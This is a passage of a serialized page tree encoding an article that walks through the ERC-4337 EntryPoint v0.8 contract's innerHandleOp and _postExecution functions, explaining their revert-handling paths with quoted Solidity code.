context,\n",{"type":26,"tag":137,"props":108042,"children":108043},{"class":5559,"line":26374},[108044],{"type":26,"tag":137,"props":108045,"children":108046},{"style":5601},[108047],{"type":32,"value":108048},"                    actualGas\n",{"type":26,"tag":137,"props":108050,"children":108051},{"class":5559,"line":26411},[108052],{"type":26,"tag":137,"props":108053,"children":108054},{"style":5601},[108055],{"type":32,"value":108056},"                );\n",{"type":26,"tag":137,"props":108058,"children":108059},{"class":5559,"line":26424},[108060],{"type":26,"tag":137,"props":108061,"children":108062},{"style":5601},[108063],{"type":32,"value":61486},{"type":26,"tag":137,"props":108065,"children":108066},{"class":5559,"line":26437},[108067],{"type":26,"tag":137,"props":108068,"children":108069},{"style":5601},[108070],{"type":32,"value":5936},{"type":26,"tag":137,"props":108072,"children":108073},{"class":5559,"line":26450},[108074],{"type":26,"tag":137,"props":108075,"children":108076},{"style":5601},[108077],{"type":32,"value":5945},{"type":26,"tag":35,"props":108079,"children":108080},{},[108081,108083,108088,108090,108096,108098,108104,108106,108112],{"type":32,"value":108082},"During execution, the ",{"type":26,"tag":130,"props":108084,"children":108086},{"className":108085},[],[108087],{"type":32,"value":104844},{"type":32,"value":108089}," contract makes a ",{"type":26,"tag":41,"props":108091,"children":108094},{"href":108092,"rel":108093},"https://github.com/eth-infinitism/account-abstraction/blob/releases/v0.8/contracts/core/EntryPoint.sol#L222-L232",[45],[108095],{"type":32,"value":40892},{"type":32,"value":108097}," to its own ",{"type":26,"tag":130,"props":108099,"children":108101},{"className":108100},[],[108102],{"type":32,"value":108103},"innerHandleOp",{"type":32,"value":108105}," function through a low-level ",{"type":26,"tag":130,"props":108107,"children":108109},{"className":108108},[],[108110],{"type":32,"value":108111},"call()",{"type":32,"value":108113},". This is done to create a new call context for executing the user operation.",{"type":26,"tag":35,"props":108115,"children":108116},{},[108117,108119,108125,108126,108131,108133,108140,108142,108148],{"type":32,"value":108118},"If this call fails (when ",{"type":26,"tag":130,"props":108120,"children":108122},{"className":108121},[],[108123],{"type":32,"value":108124},"success",{"type":32,"value":8085},{"type":26,"tag":130,"props":108127,"children":108129},{"className":108128},[],[108130],{"type":32,"value":10760},{"type":32,"value":108132},"), the code enters an ",{"type":26,"tag":41,"props":108134,"children":108137},{"href":108135,"rel":108136},"https://github.com/eth-infinitism/account-abstraction/blob/releases/v0.8/contracts/core/EntryPoint.sol#L235-L273",[45],[108138],{"type":32,"value":108139},"error handling",{"type":32,"value":108141}," flow that checks the ",{"type":26,"tag":130,"props":108143,"children":108145},{"className":108144},[],[108146],{"type":32,"value":108147},"innerRevertCode",{"type":32,"value":108149},". There are three possible paths:",{"type":26,"tag":4820,"props":108151,"children":108152},{},[108153,108177,108195],{"type":26,"tag":3430,"props":108154,"children":108155},{},[108156,108157,108162,108163,108169,108171,108176],{"type":32,"value":10064},{"type":26,"tag":130,"props":108158,"children":108160},{"className":108159},[],[108161],{"type":32,"value":108147},{"type":32,"value":8085},{"type":26,"tag":130,"props":108164,"children":108166},{"className":108165},[],[108167],{"type":32,"value":108168},"INNER_OUT_OF_GAS",{"type":32,"value":108170},", it means the bundler didn't provide enough gas for execution. This causes the entire bundle to fail with ",{"type":26,"tag":130,"props":108172,"children":108174},{"className":108173},[],[108175],{"type":32,"value":107820},{"type":32,"value":470},{"type":26,"tag":3430,"props":108178,"children":108179},{},[108180,108181,108186,108187,108193],{"type":32,"value":10064},{"type":26,"tag":130,"props":108182,"children":108184},{"className":108183},[],[108185],{"type":32,"value":108147},{"type":32,"value":8085},{"type":26,"tag":130,"props":108188,"children":108190},{"className":108189},[],[108191],{"type":32,"value":108192},"INNER_REVERT_LOW_PREFUND",{"type":32,"value":108194},", it means the user didn't prefund enough gas. In this case, it charges the entire prefund amount as gas cost.",{"type":26,"tag":3430,"props":108196,"children":108197},{},[108198,108200,108206,108208,108214],{"type":32,"value":108199},"For any other revert reason, the code will still call ",{"type":26,"tag":130,"props":108201,"children":108203},{"className":108202},[],[108204],{"type":32,"value":108205},"_postExecution()",{"type":32,"value":108207}," but with ",{"type":26,"tag":130,"props":108209,"children":108211},{"className":108210},[],[108212],{"type":32,"value":108213},"PostOpMode.postOpReverted",{"type":32,"value":108215},". This ensures proper cleanup happens even on failure.",{"type":26,"tag":35,"props":108217,"children":108218},{},[108219,108221,108226,108228,108233,108235,108240,108242,108247],{"type":32,"value":108220},"We're particularly interested in the third error path, where ",{"type":26,"tag":130,"props":108222,"children":108224},{"className":108223},[],[108225],{"type":32,"value":108147},{"type":32,"value":108227}," is neither ",{"type":26,"tag":130,"props":108229,"children":108231},{"className":108230},[],[108232],{"type":32,"value":108168},{"type":32,"value":108234}," nor ",{"type":26,"tag":130,"props":108236,"children":108238},{"className":108237},[],[108239],{"type":32,"value":108192},{"type":32,"value":108241},". To understand this case better, let's examine how ",{"type":26,"tag":130,"props":108243,"children":108245},{"className":108244},[],[108246],{"type":32,"value":108103},{"type":32,"value":108248}," works.",{"type":26,"tag":5512,"props":108250,"children":108252},{"className":7055,"code":108251,"language":7054,"meta":7,"style":7},"    function innerHandleOp(\n        bytes memory callData,\n        UserOpInfo memory opInfo,\n        bytes calldata context\n    ) external returns (uint256 actualGasCost) {\n    [...]\n        IPaymaster.PostOpMode mode = IPaymaster.PostOpMode.opSucceeded;\n        if (callData.length > 0) {\n            bool success = Exec.call(mUserOp.sender, 0, callData, callGasLimit);\n            if (!success) {\n                uint256 freePtr = _getFreePtr();\n                bytes memory result = Exec.getReturnData(REVERT_REASON_MAX_LEN);\n                if (result.length > 0) {\n                    emit UserOperationRevertReason(\n                        opInfo.userOpHash,\n                        mUserOp.sender,\n                        mUserOp.nonce,\n                        result\n                    );\n                }\n                _restoreFreePtr(freePtr);\n                mode = IPaymaster.PostOpMode.opReverted;\n            }\n        }\n\n        unchecked {\n            uint256 actualGas = preGas - gasleft() + opInfo.preOpGas;\n            return _postExecution(mode, opInfo, context, actualGas);\n        }\n    }\n",[108253],{"type":26,"tag":130,"props":108254,"children":108255},{"__ignoreMap":7},[108256,108272,108293,108313,108329,108362,108369,108386,108410,108450,108469,108494,108528,108552,108569,108577,108585,108593,108601,108609,108616,108629,108646,108653,108660,108667,108678,108717,108733,108740],{"type":26,"tag":137,"props":108257,"children":108258},{"class":5559,"line":5560},[108259,108263,108268],{"type":26,"tag":137,"props":108260,"children":108261},{"style":5573},[108262],{"type":32,"value":92433},{"type":26,"tag":137,"props":108264,"children":108265},{"style":5682},[108266],{"type":32,"value":108267}," innerHandleOp",{"type":26,"tag":137,"props":108269,"children":108270},{"style":5601},[108271],{"type":32,"value":6054},{"type":26,"tag":137,"props":108273,"children":108274},{"class":5559,"line":5412},[108275,108280,108284,108289],{"type":26,"tag":137,"props":108276,"children":108277},{"style":6009},[108278],{"type":32,"value":108279},"        bytes",{"type":26,"tag":137,"props":108281,"children":108282},{"style":5573},[108283],{"type":32,"value":105661},{"type":26,"tag":137,"props":108285,"children":108286},{"style":5584},[108287],{"type":32,"value":108288}," callData",{"type":26,"tag":137,"props":108290,"children":108291},{"style":5601},[108292],{"type":32,"value":6099},{"type":26,"tag":137,"props":108294,"children":108295},{"class":5559,"line":5417},[108296,108300,108304,108309],{"type":26,"tag":137,"props":108297,"children":108298},{"style":5573},[108299],{"type":32,"value":107320},{"type":26,"tag":137,"props":108301,"children":108302},{"style":5573},[108303],{"type":32,"value":105661},{"type":26,"tag":137,"props":108305,"children":108306},{"style":5584},[108307],{"type":32,"value":108308}," opInfo",{"type":26,"tag":137,"props":108310,"children":108311},{"style":5601},[108312],{"type":32,"value":6099},{"type":26,"tag":137,"props":108314,"children":108315},{"class":5559,"line":5642},[108316,108320,108324],{"type":26,"tag":137,"props":108317,"children":108318},{"style":6009},[108319],{"type":32,"value":108279},{"type":26,"tag":137,"props":108321,"children":108322},{"style":5573},[108323],{"type":32,"value":105593},{"type":26,"tag":137,"props":108325,"children":108326},{"style":5584},[108327],{"type":32,"value":108328}," context\n",{"type":26,"tag":137,"props":108330,"children":108331},{"class":5559,"line":5745},[108332,108337,108342,108346,108350,108354,108358],{"type":26,"tag":137,"props":108333,"children":108334},{"style":5601},[108335],{"type":32,"value":108336},"    ) ",{"type":26,"tag":137,"props":108338,"children":108339},{"style":5573},[108340],{"type":32,"value":108341},"external",{"type":26,"tag":137,"props":108343,"children":108344},{"style":5610},[108345],{"type":32,"value":78596},{"type":26,"tag":137,"props":108347,"children":108348},{"style":5601},[108349],{"type":32,"value":4625},{"type":26,"tag":137,"props":108351,"children":108352},{"style":6009},[108353],{"type":32,"value":48770},{"type":26,"tag":137,"props":108355,"children":108356},{"style":5584},[108357],{"type":32,"value":106402},{"type":26,"tag":137,"props":108359,"children":108360},{"style":5601},[108361],{"type":32,"value":17395},{"type":26,"tag":137,"props":108363,"children":108364},{"class":5559,"line":5850},[108365],{"type":26,"tag":137,"props":108366,"children":108367},{"style":5601},[108368],{"type":32,"value":107381},{"type":26,"tag":137,"props":108370,"children":108371},{"class":5559,"line":5878},[108372,108377,108381],{"type":26,"tag":137,"props":108373,"children":108374},{"style":5601},[108375],{"type":32,"value":108376},"        IPaymaster.PostOpMode mode ",{"type":26,"tag":137,"props":108378,"children":108379},{"style":5590},[108380],{"type":32,"value":289},{"type":26,"tag":137,"props":108382,"children":108383},{"style":5601},[108384],{"type":32,"value":108385}," IPaymaster.PostOpMode.opSucceeded;\n",{"type":26,"tag":137,"props":108387,"children":108388},{"class":5559,"line":5891},[108389,108393,108398,108402,108406],{"type":26,"tag":137,"props":108390,"children":108391},{"style":5610},[108392],{"type":32,"value":5856},{"type":26,"tag":137,"props":108394,"children":108395},{"style":5601},[108396],{"type":32,"value":108397}," (callData.length ",{"type":26,"tag":137,"props":108399,"children":108400},{"style":5590},[108401],{"type":32,"value":13052},{"type":26,"tag":137,"props":108403,"children":108404},{"style":5626},[108405],{"type":32,"value":5629},{"type":26,"tag":137,"props":108407,"children":108408},{"style":5601},[108409],{"type":32,"value":17395},{"type":26,"tag":137,"props":108411,"children":108412},{"class":5559,"line":5909},[108413,108418,108423,108427,108432,108436,108441,108445],{"type":26,"tag":137,"props":108414,"children":108415},{"style":6009},[108416],{"type":32,"value":108417},"            bool",{"type":26,"tag":137,"props":108419,"children":108420},{"style":5601},[108421],{"type":32,"value":108422}," success ",{"type":26,"tag":137,"props":108424,"children":108425},{"style":5590},[108426],{"type":32,"value":289},{"type":26,"tag":137,"props":108428,"children":108429},{"style":5601},[108430],{"type":32,"value":108431}," Exec.",{"type":26,"tag":137,"props":108433,"children":108434},{"style":5682},[108435],{"type":32,"value":40892},{"type":26,"tag":137,"props":108437,"children":108438},{"style":5601},[108439],{"type":32,"value":108440},"(mUserOp.sender, ",{"type":26,"tag":137,"props":108442,"children":108443},{"style":5626},[108444],{"type":32,"value":1817},{"type":26,"tag":137,"props":108446,"children":108447},{"style":5601},[108448],{"type":32,"value":108449},", callData, callGasLimit);\n",{"type":26,"tag":137,"props":108451,"children":108452},{"class":5559,"line":5930},[108453,108457,108461,108465],{"type":26,"tag":137,"props":108454,"children":108455},{"style":5610},[108456],{"type":32,"value":61402},{"type":26,"tag":137,"props":108458,"children":108459},{"style":5601},[108460],{"type":32,"value":4625},{"type":26,"tag":137,"props":108462,"children":108463},{"style":5590},[108464],{"type":32,"value":23215},{"type":26,"tag":137,"props":108466,"children":108467},{"style":5601},[108468],{"type":32,"value":107753},{"type":26,"tag":137,"props":108470,"children":108471},{"class":5559,"line":5939},[108472,108476,108481,108485,108490],{"type":26,"tag":137,"props":108473,"children":108474},{"style":6009},[108475],{"type":32,"value":106041},{"type":26,"tag":137,"props":108477,"children":108478},{"style":5601},[108479],{"type":32,"value":108480}," freePtr ",{"type":26,"tag":137,"props":108482,"children":108483},{"style":5590},[108484],{"type":32,"value":289},{"type":26,"tag":137,"props":108486,"children":108487},{"style":5682},[108488],{"type":32,"value":108489}," _getFreePtr",{"type":26,"tag":137,"props":108491,"children":108492},{"style":5601},[108493],{"type":32,"value":6267},{"type":26,"tag":137,"props":108495,"children":108496},{"class":5559,"line":6191},[108497,108501,108505,108510,108514,108518,108523],{"type":26,"tag":137,"props":108498,"children":108499},{"style":6009},[108500],{"type":32,"value":107437},{"type":26,"tag":137,"props":108502,"children":108503},{"style":5573},[108504],{"type":32,"value":105661},{"type":26,"tag":137,"props":108506,"children":108507},{"style":5601},[108508],{"type":32,"value":108509}," result ",{"type":26,"tag":137,"props":108511,"children":108512},{"style":5590},[108513],{"type":32,"value":289},{"type":26,"tag":137,"props":108515,"children":108516},{"style":5601},[108517],{"type":32,"value":108431},{"type":26,"tag":137,"props":108519,"children":108520},{"style":5682},[108521],{"type":32,"value":108522},"getReturnData",{"type":26,"tag":137,"props":108524,"children":108525},{"style":5601},[108526],{"type":32,"value":108527},"(REVERT_REASON_MAX_LEN);\n",{"type":26,"tag":137,"props":108529,"children":108530},{"class":5559,"line":6208},[108531,108535,108540,108544,108548],{"type":26,"tag":137,"props":108532,"children":108533},{"style":5610},[108534],{"type":32,"value":106101},{"type":26,"tag":137,"props":108536,"children":108537},{"style":5601},[108538],{"type":32,"value":108539}," (result.length ",{"type":26,"tag":137,"props":108541,"children":108542},{"style":5590},[108543],{"type":32,"value":13052},{"type":26,"tag":137,"props":108545,"children":108546},{"style":5626},[108547],{"type":32,"value":5629},{"type":26,"tag":137,"props":108549,"children":108550},{"style":5601},[108551],{"type":32,"value":17395},{"type":26,"tag":137,"props":108553,"children":108554},{"class":5559,"line":6225},[108555,108560,108565],{"type":26,"tag":137,"props":108556,"children":108557},{"style":5610},[108558],{"type":32,"value":108559},"                    emit",{"type":26,"tag":137,"props":108561,"children":108562},{"style":5682},[108563],{"type":32,"value":108564}," UserOperationRevertReason",{"type":26,"tag":137,"props":108566,"children":108567},{"style":5601},[108568],{"type":32,"value":6054},{"type":26,"tag":137,"props":108570,"children":108571},{"class":5559,"line":6238},[108572],{"type":26,"tag":137,"props":108573,"children":108574},{"style":5601},[108575],{"type":32,"value":108576},"                        opInfo.userOpHash,\n",{"type":26,"tag":137,"props":108578,"children":108579},{"class":5559,"line":6247},[108580],{"type":26,"tag":137,"props":108581,"children":108582},{"style":5601},[108583],{"type":32,"value":108584},"                        mUserOp.sender,\n",{"type":26,"tag":137,"props":108586,"children":108587},{"class":5559,"line":6270},[108588],{"type":26,"tag":137,"props":108589,"children":108590},{"style":5601},[108591],{"type":32,"value":108592},"                        mUserOp.nonce,\n",{"type":26,"tag":137,"props":108594,"children":108595},{"class":5559,"line":6279},[108596],{"type":26,"tag":137,"props":108597,"children":108598},{"style":5601},[108599],{"type":32,"value":108600},"                        result\n",{"type":26,"tag":137,"props":108602,"children":108603},{"class":5559,"line":6288},[108604],{"type":26,"tag":137,"props":108605,"children":108606},{"style":5601},[108607],{"type":32,"value":108608},"                    );\n",{"type":26,"tag":137,"props":108610,"children":108611},{"class":5559,"line":6355},[108612],{"type":26,"tag":137,"props":108613,"children":108614},{"style":5601},[108615],{"type":32,"value":73672},{"type":26,"tag":137,"props":108617,"children":108618},{"class":5559,"line":6363},[108619,108624],{"type":26,"tag":137,"props":108620,"children":108621},{"style":5682},[108622],{"type":32,"value":108623},"                _restoreFreePtr",{"type":26,"tag":137,"props":108625,"children":108626},{"style":5601},[108627],{"type":32,"value":108628},"(freePtr);\n",{"type":26,"tag":137,"props":108630,"children":108631},{"class":5559,"line":6393},[108632,108637,108641],{"type":26,"tag":137,"props":108633,"children":108634},{"style":5601},[108635],{"type":32,"value":108636},"                mode ",{"type":26,"tag":137,"props":108638,"children":108639},{"style":5590},[108640],{"type":32,"value":289},{"type":26,"tag":137,"props":108642,"children":108643},{"style":5601},[108644],{"type":32,"value":108645}," IPaymaster.PostOpMode.opReverted;\n",{"type":26,"tag":137,"props":108647,"children":108648},{"class":5559,"line":6401},[108649],{"type":26,"tag":137,"props":108650,"children":108651},{"style":5601},[108652],{"type":32,"value":61486},{"type":26,"tag":137,"props":108654,"children":108655},{"class":5559,"line":6433},[108656],{"type":26,"tag":137,"props":108657,"children":108658},{"style":5601},[108659],{"type":32,"value":5936},{"type":26,"tag":137,"props":108661,"children":108662},{"class":5559,"line":6441},[108663],{"type":26,"tag":137,"props":108664,"children":108665},{"emptyLinePlaceholder":18},[108666],{"type":32,"value":6276},{"type":26,"tag":137,"props":108668,"children":108669},{"class":5559,"line":6501},[108670,108674],{"type":26,"tag":137,"props":108671,"children":108672},{"style":5610},[108673],{"type":32,"value":105697},{"type":26,"tag":137,"props":108675,"children":108676},{"style":5601},[108677],{"type":32,"value":5875},{"type":26,"tag":137,"props":108679,"children":108680},{"class":5559,"line":11634},[108681,108685,108689,108693,108697,108701,108705,108709,108713],{"type":26,"tag":137,"props":108682,"children":108683},{"style":6009},[108684],{"type":32,"value":105709},{"type":26,"tag":137,"props":108686,"children":108687},{"style":5601},[108688],{"type":32,"value":107872},{"type":26,"tag":137,"props":108690,"children":108691},{"style":5590},[108692],{"type":32,"value":289},{"type":26,"tag":137,"props":108694,"children":108695},{"style":5601},[108696],{"type":32,"value":107881},{"type":26,"tag":137,"props":108698,"children":108699},{"style":5590},[108700],{"type":32,"value":6908},{"type":26,"tag":137,"props":108702,"children":108703},{"style":5573},[108704],{"type":32,"value":107890},{"type":26,"tag":137,"props":108706,"children":108707},{"style":5601},[108708],{"type":32,"value":16634},{"type":26,"tag":137,"props":108710,"children":108711},{"style":5590},[108712],{"type":32,"value":356},{"type":26,"tag":137,"props":108714,"children":108715},{"style":5601},[108716],{"type":32,"value":107903},{"type":26,"tag":137,"props":108718,"children":108719},{"class":5559,"line":11652},[108720,108724,108728],{"type":26,"tag":137,"props":108721,"children":108722},{"style":5610},[108723],{"type":32,"value":81678},{"type":26,"tag":137,"props":108725,"children":108726},{"style":5682},[108727],{"type":32,"value":108012},{"type":26,"tag":137,"props":108729,"children":108730},{"style":5601},[108731],{"type":32,"value":108732},"(mode, opInfo, context, actualGas);\n",{"type":26,"tag":137,"props":108734,"children":108735},{"class":5559,"line":11697},[108736],{"type":26,"tag":137,"props":108737,"children":108738},{"style":5601},[108739],{"type":32,"value":5936},{"type":26,"tag":137,"props":108741,"children":108742},{"class":5559,"line":11803},[108743],{"type":26,"tag":137,"props":108744,"children":108745},{"style":5601},[108746],{"type":32,"value":5945},{"type":26,"tag":35,"props":108748,"children":108749},{},[108750,108752,108757,108759,108764,108766,108772,108774,108780,108782,108787,108789,108799],{"type":32,"value":108751},"We observe that, in the happy path, ",{"type":26,"tag":130,"props":108753,"children":108755},{"className":108754},[],[108756],{"type":32,"value":108103},{"type":32,"value":108758}," is expected to not only execute the actual ",{"type":26,"tag":130,"props":108760,"children":108762},{"className":108761},[],[108763],{"type":32,"value":104763},{"type":32,"value":108765}," call, but also call ",{"type":26,"tag":130,"props":108767,"children":108769},{"className":108768},[],[108770],{"type":32,"value":108771},"_postExecution",{"type":32,"value":108773},". This means that the third failure handling path, which passes ",{"type":26,"tag":130,"props":108775,"children":108777},{"className":108776},[],[108778],{"type":32,"value":108779},"postOpReverted",{"type":32,"value":108781}," as its mode, happens when something goes wrong with the ",{"type":26,"tag":130,"props":108783,"children":108785},{"className":108784},[],[108786],{"type":32,"value":108771},{"type":32,"value":108788}," call ",{"type":26,"tag":84,"props":108790,"children":108791},{},[108792,108794],{"type":32,"value":108793},"inside ",{"type":26,"tag":130,"props":108795,"children":108797},{"className":108796},[],[108798],{"type":32,"value":108103},{"type":32,"value":470},{"type":26,"tag":35,"props":108801,"children":108802},{},[108803,108805,108810],{"type":32,"value":108804},"Let's examine the ",{"type":26,"tag":130,"props":108806,"children":108808},{"className":108807},[],[108809],{"type":32,"value":108771},{"type":32,"value":108811}," code to understand where the revert might occur.",{"type":26,"tag":5512,"props":108813,"children":108815},{"className":7055,"code":108814,"language":7054,"meta":7,"style":7},"    function _postExecution(\n        IPaymaster.PostOpMode mode,\n        UserOpInfo memory opInfo,\n        bytes memory context,\n        uint256 actualGas\n    ) internal virtual returns (uint256 actualGasCost) {\n    [...]\n            if (paymaster == address(0)) {\n                refundAddress = mUserOp.sender;\n            } else {\n                refundAddress = paymaster;\n                if (context.length > 0) {\n                    actualGasCost = actualGas * gasPrice;\n                    uint256 postOpPreGas = gasleft();\n                    if (mode != IPaymaster.PostOpMode.postOpReverted) {\n                        try IPaymaster(paymaster).postOp{\n                                gas: mUserOp.paymasterPostOpGasLimit\n                            }(mode, context, actualGasCost, gasPrice)\n                        // solhint-disable-next-line no-empty-blocks\n                        {} catch {\n                            bytes memory reason = Exec.getReturnData(REVERT_REASON_MAX_LEN);\n                            revert PostOpReverted(reason);\n                        }\n                    }\n                    // Calculating a penalty for unused postOp gas\n                    // note that if postOp is reverted, the maximum penalty (10% of postOpGasLimit) is charged.\n                    uint256 postOpGasUsed = postOpPreGas - gasleft();\n                    postOpUnusedGasPenalty = _getUnusedGasPenalty(postOpGasUsed, mUserOp.paymasterPostOpGasLimit);\n                }\n            }\n    [...]\n    }\n",[108816],{"type":26,"tag":130,"props":108817,"children":108818},{"__ignoreMap":7},[108819,108834,108859,108878,108897,108909,108946,108953,108985,109002,109017,109033,109057,109082,109106,109128,109146,109163,109171,109189,109205,109238,109256,109263,109270,109278,109294,109326,109348,109355,109362,109369],{"type":26,"tag":137,"props":108820,"children":108821},{"class":5559,"line":5560},[108822,108826,108830],{"type":26,"tag":137,"props":108823,"children":108824},{"style":5573},[108825],{"type":32,"value":92433},{"type":26,"tag":137,"props":108827,"children":108828},{"style":5682},[108829],{"type":32,"value":108012},{"type":26,"tag":137,"props":108831,"children":108832},{"style":5601},[108833],{"type":32,"value":6054},{"type":26,"tag":137,"props":108835,"children":108836},{"class":5559,"line":5412},[108837,108842,108846,108850,108855],{"type":26,"tag":137,"props":108838,"children":108839},{"style":5573},[108840],{"type":32,"value":108841},"        IPaymaster",{"type":26,"tag":137,"props":108843,"children":108844},{"style":5601},[108845],{"type":32,"value":470},{"type":26,"tag":137,"props":108847,"children":108848},{"style":5584},[108849],{"type":32,"value":106373},{"type":26,"tag":137,"props":108851,"children":108852},{"style":5584},[108853],{"type":32,"value":108854}," mode",{"type":26,"tag":137,"props":108856,"children":108857},{"style":5601},[108858],{"type":32,"value":6099},{"type":26,"tag":137,"props":108860,"children":108861},{"class":5559,"line":5417},[108862,108866,108870,108874],{"type":26,"tag":137,"props":108863,"children":108864},{"style":5573},[108865],{"type":32,"value":107320},{"type":26,"tag":137,"props":108867,"children":108868},{"style":5573},[108869],{"type":32,"value":105661},{"type":26,"tag":137,"props":108871,"children":108872},{"style":5584},[108873],{"type":32,"value":108308},{"type":26,"tag":137,"props":108875,"children":108876},{"style":5601},[108877],{"type":32,"value":6099},{"type":26,"tag":137,"props":108879,"children":108880},{"class":5559,"line":5642},[108881,108885,108889,108893],{"type":26,"tag":137,"props":108882,"children":108883},{"style":6009},[108884],{"type":32,"value":108279},{"type":26,"tag":137,"props":108886,"children":108887},{"style":5573},[108888],{"type":32,"value":105661},{"type":26,"tag":137,"props":108890,"children":108891},{"style":5584},[108892],{"type":32,"value":78943},{"type":26,"tag":137,"props":108894,"children":108895},{"style":5601},[108896],{"type":32,"value":6099},{"type":26,"tag":137,"props":108898,"children":108899},{"class":5559,"line":5745},[108900,108904],{"type":26,"tag":137,"props":108901,"children":108902},{"style":6009},[108903],{"type":32,"value":92611},{"type":26,"tag":137,"props":108905,"children":108906},{"style":5584},[108907],{"type":32,"value":108908}," actualGas\n",{"type":26,"tag":137,"props":108910,"children":108911},{"class":5559,"line":5850},[108912,108916,108921,108926,108930,108934,108938,108942],{"type":26,"tag":137,"props":108913,"children":108914},{"style":5601},[108915],{"type":32,"value":108336},{"type":26,"tag":137,"props":108917,"children":108918},{"style":5573},[108919],{"type":32,"value":108920},"internal",{"type":26,"tag":137,"props":108922,"children":108923},{"style":5573},[108924],{"type":32,"value":108925}," virtual",{"type":26,"tag":137,"props":108927,"children":108928},{"style":5610},[108929],{"type":32,"value":78596},{"type":26,"tag":137,"props":108931,"children":108932},{"style":5601},[108933],{"type":32,"value":4625},{"type":26,"tag":137,"props":108935,"children":108936},{"style":6009},[108937],{"type":32,"value":48770},{"type":26,"tag":137,"props":108939,"children":108940},{"style":5584},[108941],{"type":32,"value":106402},{"type":26,"tag":137,"props":108943,"children":108944},{"style":5601},[108945],{"type":32,"value":17395},{"type":26,"tag":137,"props":108947,"children":108948},{"class":5559,"line":5878},[108949],{"type":26,"tag":137,"props":108950,"children":108951},{"style":5601},[108952],{"type":32,"value":107381},{"type":26,"tag":137,"props":108954,"children":108955},{"class":5559,"line":5891},[108956,108960,108965,108969,108973,108977,108981],{"type":26,"tag":137,"props":108957,"children":108958},{"style":5610},[108959],{"type":32,"value":61402},{"type":26,"tag":137,"props":108961,"children":108962},{"style":5601},[108963],{"type":32,"value":108964}," (paymaster ",{"type":26,"tag":137,"props":108966,"children":108967},{"style":5590},[108968],{"type":32,"value":11161},{"type":26,"tag":137,"props":108970,"children":108971},{"style":6009},[108972],{"type":32,"value":8835},{"type":26,"tag":137,"props":108974,"children":108975},{"style":5601},[108976],{"type":32,"value":165},{"type":26,"tag":137,"props":108978,"children":108979},{"style":5626},[108980],{"type":32,"value":1817},{"type":26,"tag":137,"props":108982,"children":108983},{"style":5601},[108984],{"type":32,"value":37790},{"type":26,"tag":137,"props":108986,"children":108987},{"class":5559,"line":5909},[108988,108993,108997],{"type":26,"tag":137,"props":108989,"children":108990},{"style":5601},[108991],{"type":32,"value":108992},"                refundAddress ",{"type":26,"tag":137,"props":108994,"children":108995},{"style":5590},[108996],{"type":32,"value":289},{"type":26,"tag":137,"props":108998,"children":108999},{"style":5601},[109000],{"type":32,"value":109001}," mUserOp.sender;\n",{"type":26,"tag":137,"props":109003,"children":109004},{"class":5559,"line":5930},[109005,109009,109013],{"type":26,"tag":137,"props":109006,"children":109007},{"style":5601},[109008],{"type":32,"value":73195},{"type":26,"tag":137,"props":109010,"children":109011},{"style":5610},[109012],{"type":32,"value":5902},{"type":26,"tag":137,"props":109014,"children":109015},{"style":5601},[109016],{"type":32,"value":5875},{"type":26,"tag":137,"props":109018,"children":109019},{"class":5559,"line":5939},[109020,109024,109028],{"type":26,"tag":137,"props":109021,"children":109022},{"style":5601},[109023],{"type":32,"value":108992},{"type":26,"tag":137,"props":109025,"children":109026},{"style":5590},[109027],{"type":32,"value":289},{"type":26,"tag":137,"props":109029,"children":109030},{"style":5601},[109031],{"type":32,"value":109032}," paymaster;\n",{"type":26,"tag":137,"props":109034,"children":109035},{"class":5559,"line":6191},[109036,109040,109045,109049,109053],{"type":26,"tag":137,"props":109037,"children":109038},{"style":5610},[109039],{"type":32,"value":106101},{"type":26,"tag":137,"props":109041,"children":109042},{"style":5601},[109043],{"type":32,"value":109044}," (context.length ",{"type":26,"tag":137,"props":109046,"children":109047},{"style":5590},[109048],{"type":32,"value":13052},{"type":26,"tag":137,"props":109050,"children":109051},{"style":5626},[109052],{"type":32,"value":5629},{"type":26,"tag":137,"props":109054,"children":109055},{"style":5601},[109056],{"type":32,"value":17395},{"type":26,"tag":137,"props":109058,"children":109059},{"class":5559,"line":6208},[109060,109065,109069,109073,109077],{"type":26,"tag":137,"props":109061,"children":109062},{"style":5601},[109063],{"type":32,"value":109064},"                    actualGasCost ",{"type":26,"tag":137,"props":109066,"children":109067},{"style":5590},[109068],{"type":32,"value":289},{"type":26,"tag":137,"props":109070,"children":109071},{"style":5601},[109072],{"type":32,"value":107872},{"type":26,"tag":137,"props":109074,"children":109075},{"style":5590},[109076],{"type":32,"value":7152},{"type":26,"tag":137,"props":109078,"children":109079},{"style":5601},[109080],{"type":32,"value":109081}," gasPrice;\n",{"type":26,"tag":137,"props":109083,"children":109084},{"class":5559,"line":6225},[109085,109089,109094,109098,109102],{"type":26,"tag":137,"props":109086,"children":109087},{"style":6009},[109088],{"type":32,"value":106058},{"type":26,"tag":137,"props":109090,"children":109091},{"style":5601},[109092],{"type":32,"value":109093}," postOpPreGas ",{"type":26,"tag":137,"props":109095,"children":109096},{"style":5590},[109097],{"type":32,"value":289},{"type":26,"tag":137,"props":109099,"children":109100},{"style":5573},[109101],{"type":32,"value":107890},{"type":26,"tag":137,"props":109103,"children":109104},{"style":5601},[109105],{"type":32,"value":6267},{"type":26,"tag":137,"props":109107,"children":109108},{"class":5559,"line":6238},[109109,109114,109119,109123],{"type":26,"tag":137,"props":109110,"children":109111},{"style":5610},[109112],{"type":32,"value":109113},"                    if",{"type":26,"tag":137,"props":109115,"children":109116},{"style":5601},[109117],{"type":32,"value":109118}," (mode ",{"type":26,"tag":137,"props":109120,"children":109121},{"style":5590},[109122],{"type":32,"value":18280},{"type":26,"tag":137,"props":109124,"children":109125},{"style":5601},[109126],{"type":32,"value":109127}," IPaymaster.PostOpMode.postOpReverted) {\n",{"type":26,"tag":137,"props":109129,"children":109130},{"class":5559,"line":6247},[109131,109136,109141],{"type":26,"tag":137,"props":109132,"children":109133},{"style":5610},[109134],{"type":32,"value":109135},"                        try",{"type":26,"tag":137,"props":109137,"children":109138},{"style":5682},[109139],{"type":32,"value":109140}," IPaymaster",{"type":26,"tag":137,"props":109142,"children":109143},{"style":5601},[109144],{"type":32,"value":109145},"(paymaster).postOp{\n",{"type":26,"tag":137,"props":109147,"children":109148},{"class":5559,"line":6270},[109149,109154,109158],{"type":26,"tag":137,"props":109150,"children":109151},{"style":5601},[109152],{"type":32,"value":109153},"                                gas",{"type":26,"tag":137,"props":109155,"children":109156},{"style":5590},[109157],{"type":32,"value":7072},{"type":26,"tag":137,"props":109159,"children":109160},{"style":5601},[109161],{"type":32,"value":109162}," 